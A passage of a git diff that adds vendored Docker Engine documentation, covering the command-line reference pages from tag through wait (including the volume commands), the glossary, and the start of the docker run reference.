+Deleted Containers: +0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b +73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d + +Deleted Volumes: +named-vol + +Deleted Images: +untagged: my-curl:latest +deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d +deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b +untagged: alpine:3.3 +deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f +untagged: alpine:latest +deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96 +deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f +deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab +deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3 +untagged: my-jq:latest +deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1 +deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f +deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548 + +Total reclaimed space: 13.5 MB +``` + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md new file mode 100644 index 0000000000..983bfe27b2 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md @@ -0,0 +1,74 @@ +--- +title: "tag" +description: "The tag command description and usage" +keywords: "tag, name, image" +--- + + + +# tag + +```markdown +Usage: docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG] + +Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE + +Options: + --help Print usage +``` + +An image name is made up of slash-separated name components, optionally prefixed +by a registry hostname. The hostname must comply with standard DNS rules, but +may not contain underscores. If a hostname is present, it may optionally be +followed by a port number in the format `:8080`. If not present, the command +uses Docker's public registry located at `registry-1.docker.io` by default. Name +components may contain lowercase characters, digits and separators. A separator +is defined as a period, one or two underscores, or one or more dashes. A name +component may not start or end with a separator. + +A tag name may contain lowercase and uppercase characters, digits, underscores, +periods and dashes. A tag name may not start with a period or a dash and may +contain a maximum of 128 characters. + +You can group your images together using names and tags, and then upload them +to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). + +# Examples + +## Tagging an image referenced by ID + +To tag a local image with ID "0e5574283393" into the "fedora" repository with +"version1.0": + + docker tag 0e5574283393 fedora/httpd:version1.0 + +## Tagging an image referenced by Name + +To tag a local image with name "httpd" into the "fedora" repository with +"version1.0": + + docker tag httpd fedora/httpd:version1.0 + +Note that since the tag name is not specified, the alias is created for an +existing local version `httpd:latest`. + +## Tagging an image referenced by Name and Tag + +To tag a local image with name "httpd" and tag "test" into the "fedora" +repository with "version1.0.test": + + docker tag httpd:test fedora/httpd:version1.0.test + +## Tagging an image for a private repository + +To push an image to a private registry and not the central Docker +registry you must tag it with the registry hostname and port (if needed). + + docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md new file mode 100644 index 0000000000..0a04828775 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/top.md @@ -0,0 +1,25 @@ +--- +title: "top" +description: "The top command description and usage" +keywords: "container, running, processes" +--- + + + +# top + +```markdown +Usage: docker top CONTAINER [ps OPTIONS] + +Display the running processes of a container + +Options: + --help Print usage +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md new file mode 100644 index 0000000000..aa2326fefc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md @@ -0,0 +1,36 @@ +--- +title: "unpause" +description: "The unpause command description and usage" +keywords: "cgroups, suspend, container" +--- + + + +# unpause + +```markdown +Usage: docker unpause CONTAINER [CONTAINER...] + +Unpause all processes within one or more containers + +Options: + --help Print usage +``` + +The `docker unpause` command un-suspends all processes in the specified containers. +On Linux, it does this using the cgroups freezer. + +See the +[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) +for further details. + +## Related information + +* [pause](pause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md new file mode 100644 index 0000000000..a13900440f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/update.md @@ -0,0 +1,120 @@ +--- +title: "update" +description: "The update command description and usage" +keywords: "resources, update, dynamically" +--- + + + +## update + +```markdown +Usage: docker update [OPTIONS] CONTAINER [CONTAINER...] + +Update configuration of one or more containers + +Options: + --blkio-weight value Block IO (relative weight), between 10 and 1000 + --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpu-rt-period int Limit the CPU real-time period in microseconds + --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --help Print usage + --kernel-memory string Kernel memory limit + -m, --memory string Memory limit + --memory-reservation string Memory soft limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --restart string Restart policy to apply when a container exits +``` + +The `docker update` command dynamically updates container configuration. +You can use this command to prevent containers from consuming too many +resources from their Docker host. With a single command, you can place +limits on a single container or on many. To specify more than one container, +provide space-separated list of container names or IDs. + +With the exception of the `--kernel-memory` option, you can specify these +options on a running or a stopped container. On kernel version older than +4.6, you can only update `--kernel-memory` on a stopped container or on +a running container with kernel memory initialized. + +## Examples + +The following sections illustrate ways to use this command. + +### Update a container's cpu-shares + +To limit a container's cpu-shares to 512, first identify the container +name or ID. You can use `docker ps` to find these values. You can also +use the ID returned from the `docker run` command. Then, do the following: + +```bash +$ docker update --cpu-shares 512 abebf7571666 +``` + +### Update a container with cpu-shares and memory + +To update multiple resource configurations for multiple containers: + +```bash +$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse +``` + +### Update a container's kernel memory constraints + +You can update a container's kernel memory limit using the `--kernel-memory` +option. On kernel version older than 4.6, this option can be updated on a +running container only if the container was started with `--kernel-memory`. +If the container was started *without* `--kernel-memory` you need to stop +the container before updating kernel memory. + +For example, if you started a container with this command: + +```bash +$ docker run -dit --name test --kernel-memory 50M ubuntu bash +``` + +You can update kernel memory while the container is running: + +```bash +$ docker update --kernel-memory 80M test +``` + +If you started a container *without* kernel memory initialized: + +```bash +$ docker run -dit --name test2 --memory 300M ubuntu bash +``` + +Update kernel memory of running container `test2` will fail. You need to stop +the container before updating the `--kernel-memory` setting. The next time you +start it, the container uses the new value. + +Kernel version newer than (include) 4.6 does not have this limitation, you +can use `--kernel-memory` the same way as other options. + +### Update a container's restart policy + +You can change a container's restart policy on a running container. The new +restart policy takes effect instantly after you run `docker update` on a +container. + +To update restart policy for one or more containers: + +```bash +$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse +``` + +Note that if the container is started with "--rm" flag, you cannot update the restart +policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the +container. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md new file mode 100644 index 0000000000..cb1bcee5b3 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/version.md @@ -0,0 +1,67 @@ +--- +title: "version" +description: "The version command description and usage" +keywords: "version, architecture, api" +--- + + + +# version + +```markdown +Usage: docker version [OPTIONS] + +Show the Docker version information + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +By default, this will render all version information in an easy to read +layout. If a format is specified, the given template will be executed instead. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +**Default output:** + + $ docker version + Client: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + + Server: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + +**Get server version:** + + {% raw %} + $ docker version --format '{{.Server.Version}}' + 1.8.0 + {% endraw %} + +**Dump raw data:** + + {% raw %} + $ docker version --format '{{json .}}' + {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md new file mode 100644 index 0000000000..9b188a9500 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md @@ -0,0 +1,91 @@ +--- +title: "volume create" +description: "The volume create command description and usage" +keywords: "volume, create" +--- + + + +# volume create + +```markdown +Usage: docker volume create [OPTIONS] [VOLUME] + +Create a volume + +Options: + -d, --driver string Specify volume driver name (default "local") + --help Print usage + --label value Set metadata for a volume (default []) + -o, --opt value Set driver specific options (default map[]) +``` + +Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. You create a volume and then configure the container to use it, for example: + +```bash +$ docker volume create hello +hello + +$ docker run -d -v hello:/world busybox ls /world +``` + +The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container. + +Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data. + +Volume names must be unique among drivers. This means you cannot use the same volume name with two different drivers. If you attempt this `docker` returns an error: + +``` +A volume named "hello" already exists with the "some-other" driver. Choose a different volume name. +``` + +If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error. + +## Driver specific options + +Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options: + +```bash +$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey +``` + +These options are passed directly to the volume driver. Options for +different volume drivers may do different things (or nothing at all). + +The built-in `local` driver on Windows does not support any options. + +The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html). + +For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000. + +```bash +$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo +``` + +Another example that uses `btrfs`: + +```bash +$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo +``` + +Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`: + +```bash +$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo +``` + + +## Related information + +* [volume inspect](volume_inspect.md) +* [volume ls](volume_ls.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md new file mode 100644 index 0000000000..98e0ee5abf --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md @@ -0,0 +1,59 @@ +--- +title: "volume inspect" +description: "The volume inspect command description and usage" +keywords: "volume, inspect" +--- + + + +# volume inspect + +```markdown +Usage: docker volume inspect [OPTIONS] VOLUME [VOLUME...] + +Display detailed information on one or more volumes + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about a volume. By default, this command renders all results +in a JSON array. You can specify an alternate format to execute a +given template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. + +Example output: + + $ docker volume create + 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + [ + { + "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data", + "Status": null + } + ] + + {% raw %} + $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d + /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data + {% endraw %} + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md new file mode 100644 index 0000000000..90ecef2abe --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md @@ -0,0 +1,183 @@ +--- +title: "volume ls" +description: "The volume ls command description and usage" +keywords: "volume, list" +--- + + + +# volume ls + +```markdown +Usage: docker volume ls [OPTIONS] + +List volumes + +Aliases: + ls, list + +Options: + -f, --filter value Provide filter values (e.g. 'dangling=true') (default []) + - dangling= a volume if referenced or not + - driver= a volume's driver name + - label= or label== + - name= a volume's name + --format string Pretty-print volumes using a Go template + --help Print usage + -q, --quiet Only display volume names +``` + +List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + +```bash +$ docker volume create rosemary +rosemary +$docker volume create tyler +tyler +$ docker volume ls +DRIVER VOLUME NAME +local rosemary +local tyler +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* dangling (boolean - true or false, 0 or 1) +* driver (a volume driver's name) +* label (`label=` or `label==`) +* name (a volume's name) + +### dangling + +The `dangling` filter matches on all volumes not referenced by any containers + +```bash +$ docker run -d -v tyler:/tmpwork busybox + +f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18 +$ docker volume ls -f dangling=true +DRIVER VOLUME NAME +local rosemary +``` + +### driver + +The `driver` filter matches on all or part of a volume's driver name. + +The following filter matches all volumes with a driver name containing the `local` string. + +```bash +$ docker volume ls -f driver=local + +DRIVER VOLUME NAME +local rosemary +local tyler +``` + +#### Label + +The `label` filter matches volumes based on the presence of a `label` alone or +a `label` and a value. + +First, let's create some volumes to illustrate this; + +```bash +$ docker volume create the-doctor --label is-timelord=yes +the-doctor +$ docker volume create daleks --label is-timelord=no +daleks +``` + +The following example filter matches volumes with the `is-timelord` label +regardless of its value. + +```bash +$ docker volume ls --filter label=is-timelord + +DRIVER VOLUME NAME +local daleks +local the-doctor +``` + +As can be seen in the above example, both volumes with `is-timelord=yes`, and +`is-timelord=no` are returned. + +Filtering on both `key` *and* `value` of the label, produces the expected result: + +```bash +$ docker volume ls --filter label=is-timelord=yes + +DRIVER VOLUME NAME +local the-doctor +``` + +Specifying multiple label filter produces an "and" search; all conditions +should be met; + +```bash +$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no + +DRIVER VOLUME NAME +``` + +### name + +The `name` filter matches on all or part of a volume's name. + +The following filter matches all volumes with a name containing the `rose` string. + + $ docker volume ls -f name=rose + DRIVER VOLUME NAME + local rosemary + +## Formatting + +The formatting options (`--format`) pretty-prints volumes output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +--------------|------------------------------------------------------------------------------------------ +`.Name` | Network name +`.Driver` | Network driver +`.Scope` | Network scope (local, global) +`.Mountpoint` | Whether the network is internal or not. +`.Labels` | All labels assigned to the volume. +`.Label` | Value of a specific label for this volume. For example `{{.Label "project.version"}}` + +When using the `--format` option, the `volume ls` command will either +output the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. + +The following example uses a template without headers and outputs the +`Name` and `Driver` entries separated by a colon for all volumes: + +```bash +$ docker volume ls --format "{{.Name}}: {{.Driver}}" +vol1: local +vol2: local +vol3: local +``` + +## Related information + +* [volume create](volume_create.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md new file mode 100644 index 0000000000..d910a49cdc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md @@ -0,0 +1,54 @@ +--- +title: "volume prune" +description: "Remove unused volumes" +keywords: "volume, prune, delete" +--- + + + +# volume prune + +```markdown +Usage: docker volume prune [OPTIONS] + +Remove all unused volumes + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused volumes. Unused volumes are those which are not referenced by any containers + +Example output: + +```bash +$ docker volume prune +WARNING! This will remove all volumes not used by at least one container. +Are you sure you want to continue? [y/N] y +Deleted Volumes: +07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e +my-named-vol + +Total reclaimed space: 36 B +``` + +## Related information + +* [volume create](volume_create.md) +* [volume ls](volume_ls.md) +* [volume inspect](volume_inspect.md) +* [volume rm](volume_rm.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md new file mode 100644 index 0000000000..1bf9dba220 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md @@ -0,0 +1,42 @@ +--- +title: "volume rm" +description: "the volume rm command description and usage" +keywords: "volume, rm" +--- + + + +# volume rm + +```markdown +Usage: docker volume rm [OPTIONS] VOLUME [VOLUME...] + +Remove one or more volumes + +Aliases: + rm, remove + +Options: + -f, --force Force the removal of one or more volumes + --help Print usage +``` + +Remove one or more volumes. You cannot remove a volume that is in use by a container. + + $ docker volume rm hello + hello + +## Related information + +* [volume create](volume_create.md) +* [volume inspect](volume_inspect.md) +* [volume ls](volume_ls.md) +* [volume prune](volume_prune.md) +* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md new file mode 100644 index 0000000000..a07b82b071 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md @@ -0,0 +1,25 @@ +--- +title: "wait" +description: "The wait command description and usage" +keywords: "container, stop, wait" +--- + + + +# wait + +```markdown +Usage: docker wait CONTAINER [CONTAINER...] + +Block until one or more containers stop, then print their exit codes + +Options: + --help Print usage +``` diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md new file mode 100644 index 0000000000..0bc39a2023 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/glossary.md @@ -0,0 +1,286 @@ +--- +title: "Docker Glossary" +description: "Glossary of terms used around Docker" +keywords: "glossary, docker, terms, definitions" +--- + + + +# Glossary + +A list of terms used around the Docker project. + +## aufs + +aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that +Docker supports as a storage backend. It implements the +[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems. + +## base image + +An image that has no parent is a **base image**. + +## boot2docker + +[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made +specifically to run Docker containers. The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox. + +## btrfs + +btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker +supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) +filesystem. + +## build + +build is the process of building Docker images using a [Dockerfile](#dockerfile). +The build uses a Dockerfile and a "context". The context is the set of files in the +directory in which the image is built. + +## cgroups + +cgroups is a Linux kernel feature that limits, accounts for, and isolates +the resource usage (CPU, memory, disk I/O, network, etc.) of a collection +of processes. Docker relies on cgroups to control and isolate resource limits. + +*Also known as : control groups* + +## Compose + +[Compose](https://github.com/docker/compose) is a tool for defining and +running complex applications with Docker. With compose, you define a +multi-container application in a single file, then spin your +application up in a single command which does everything that needs to +be done to get it running. + +*Also known as : docker-compose, fig* + +## container + +A container is a runtime instance of a [docker image](#image). + +A Docker container consists of + +- A Docker image +- Execution environment +- A standard set of instructions + +The concept is borrowed from Shipping Containers, which define a standard to ship +goods globally. Docker defines a standard to ship software. + +## data volume + +A data volume is a specially-designated directory within one or more containers +that bypasses the Union File System. Data volumes are designed to persist data, +independent of the container's life cycle. Docker therefore never automatically +delete volumes when you remove a container, nor will it "garbage collect" +volumes that are no longer referenced by a container. + + +## Docker + +The term Docker can refer to + +- The Docker project as a whole, which is a platform for developers and sysadmins to +develop, ship, and run applications +- The docker daemon process running on the host which manages images and containers + + +## Docker Hub + +The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with +Docker and its components. It provides the following services: + +- Docker image hosting +- User authentication +- Automated image builds and work-flow tools such as build triggers and web hooks +- Integration with GitHub and Bitbucket + + +## Dockerfile + +A Dockerfile is a text document that contains all the commands you would +normally execute manually in order to build a Docker image. Docker can +build images automatically by reading the instructions from a Dockerfile. + +## filesystem + +A file system is the method an operating system uses to name files +and assign them locations for efficient storage and retrieval. + +Examples : + +- Linux : ext4, aufs, btrfs, zfs +- Windows : NTFS +- macOS : HFS+ + +## image + +Docker images are the basis of [containers](#container). An Image is an +ordered collection of root filesystem changes and the corresponding +execution parameters for use within a container runtime. An image typically +contains a union of layered filesystems stacked on top of each other. An image +does not have state and it never changes. + +## libcontainer + +libcontainer provides a native Go implementation for creating containers with +namespaces, cgroups, capabilities, and filesystem access controls. It allows +you to manage the lifecycle of the container performing additional operations +after the container is created. + +## libnetwork + +libnetwork provides a native Go implementation for creating and managing container +network namespaces and other network resources. It manage the networking lifecycle +of the container performing additional operations after the container is created. + +## link + +links provide a legacy interface to connect Docker containers running on the +same host to each other without exposing the hosts' network ports. Use the +Docker networks feature instead. + +## Machine + +[Machine](https://github.com/docker/machine) is a Docker tool which +makes it really easy to create Docker hosts on your computer, on +cloud providers and inside your own data center. It creates servers, +installs Docker on them, then configures the Docker client to talk to them. + +*Also known as : docker-machine* + +## node + +A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual +machine running an instance of the Docker Engine in swarm mode. + +**Manager nodes** perform swarm management and orchestration duties. By default +manager nodes are also worker nodes. + +**Worker nodes** execute tasks. + +## overlay network driver + +Overlay network driver provides out of the box multi-host network connectivity +for docker containers in a cluster. + +## overlay storage driver + +OverlayFS is a [filesystem](#filesystem) service for Linux which implements a +[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems. +It is supported by the Docker daemon as a storage driver. + +## registry + +A Registry is a hosted service containing [repositories](#repository) of [images](#image) +which responds to the Registry API. + +The default registry can be accessed using a browser at [Docker Hub](#docker-hub) +or using the `docker search` command. + +## repository + +A repository is a set of Docker images. A repository can be shared by pushing it +to a [registry](#registry) server. The different images in the repository can be +labeled using [tags](#tag). + +Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/) +and its [tags](https://hub.docker.com/r/library/nginx/tags/) + + +## service + +A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how +you want to run your application containers in a swarm. At the most basic level +a service defines which container image to run in the swarm and which commands +to run in the container. For orchestration purposes, the service defines the +"desired state", meaning how many containers to run as tasks and constraints for +deploying the containers. + +Frequently a service is a microservice within the context of some larger +application. Examples of services might include an HTTP server, a database, or +any other type of executable program that you wish to run in a distributed +environment. + +## service discovery + +Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component +internal to the swarm that automatically assigns each service on an overlay +network in the swarm a VIP and DNS entry. Containers on the network share DNS +mappings for the service via gossip so any container on the network can access +the service via its service name. + +You don’t need to expose service-specific ports to make the service available to +other services on the same overlay network. The swarm’s internal load balancer +automatically distributes requests to the service VIP among the active tasks. + +## swarm + +A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode). + +## Docker Swarm + +Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine. + +Docker Swarm is the name of a standalone native clustering tool for Docker. +Docker Swarm pools together several Docker hosts and exposes them as a single +virtual Docker host. It serves the standard Docker API, so any tool that already +works with Docker can now transparently scale up to multiple hosts. + +*Also known as : docker-swarm* + +## swarm mode + +[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration +features embedded in Docker Engine. When you initialize a new swarm (cluster) or +join nodes to a swarm, the Docker Engine runs in swarm mode. + +## tag + +A tag is a label applied to a Docker image in a [repository](#repository). +tags are how various images in a repository are distinguished from each other. + +*Note : This label is not related to the key=value labels set for docker daemon* + +## task + +A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the +atomic unit of scheduling within a swarm. A task carries a Docker container and +the commands to run inside the container. Manager nodes assign tasks to worker +nodes according to the number of replicas set in the service scale. + +The diagram below illustrates the relationship of services to tasks and +containers. + +![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png) + +## Toolbox + +Docker Toolbox is the installer for Mac and Windows users. + + +## Union file system + +Union file systems, or UnionFS, are file systems that operate by creating layers, making them +very lightweight and fast. Docker uses union file systems to provide the building +blocks for containers. + + +## virtual machine + +A virtual machine is a program that emulates a complete computer and imitates dedicated hardware. +It shares physical hardware resources with other users but isolates the operating system. The +end user has the same experience on a Virtual Machine as they would have on dedicated hardware. + +Compared to containers, a virtual machine is heavier to run, provides more isolation, +gets its own set of resources and does minimal sharing. + +*Also known as : VM* diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md new file mode 100644 index 0000000000..f24c342dfc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/index.md @@ -0,0 +1,21 @@ +--- +title: "Engine reference" +description: "Docker Engine reference" +keywords: "Engine" +--- + + + +# Engine reference + +* [Dockerfile reference](builder.md) +* [Docker run reference](run.md) +* [Command line reference](commandline/index.md) +* [API Reference](https://docs.docker.com/engine/api/) diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md new file mode 100644 index 0000000000..73769ed610 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/run.md @@ -0,0 +1,1555 @@ +--- +title: "Docker run reference" +description: "Configure containers at runtime" +keywords: "docker, run, configure, runtime" +--- + + + +# Docker run reference + +Docker runs processes in isolated containers. A container is a process +which runs on a host. The host may be local or remote. When an operator +executes `docker run`, the container process that runs is isolated in +that it has its own file system, its own networking, and its own +isolated process tree separate from the host. + +This page details how to use the `docker run` command to define the +container's resources at runtime. + +## General form + +The basic `docker run` command takes this form: + + $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] + +The `docker run` command must specify an [*IMAGE*](glossary.md#image) +to derive the container from. An image developer can define image +defaults related to: + + * detached or foreground running + * container identification + * network settings + * runtime constraints on CPU and memory + +With the `docker run [OPTIONS]` an operator can add to or override the +image defaults set by a developer. And, additionally, operators can +override nearly all the defaults set by the Docker runtime itself. The +operator's ability to override image and Docker runtime defaults is why +[*run*](commandline/run.md) has more options than any +other `docker` command. + +To learn how to interpret the types of `[OPTIONS]`, see [*Option +types*](commandline/cli.md#option-types). + +> **Note**: Depending on your Docker system configuration, you may be +> required to preface the `docker run` command with `sudo`. To avoid +> having to use `sudo` with the `docker` command, your system +> administrator can create a Unix group called `docker` and add users to +> it. For more information about this configuration, refer to the Docker +> installation documentation for your operating system. + + +## Operator exclusive options + +Only the operator (the person executing `docker run`) can set the +following options. + + - [Detached vs foreground](#detached-vs-foreground) + - [Detached (-d)](#detached--d) + - [Foreground](#foreground) + - [Container identification](#container-identification) + - [Name (--name)](#name---name) + - [PID equivalent](#pid-equivalent) + - [IPC settings (--ipc)](#ipc-settings---ipc) + - [Network settings](#network-settings) + - [Restart policies (--restart)](#restart-policies---restart) + - [Clean up (--rm)](#clean-up---rm) + - 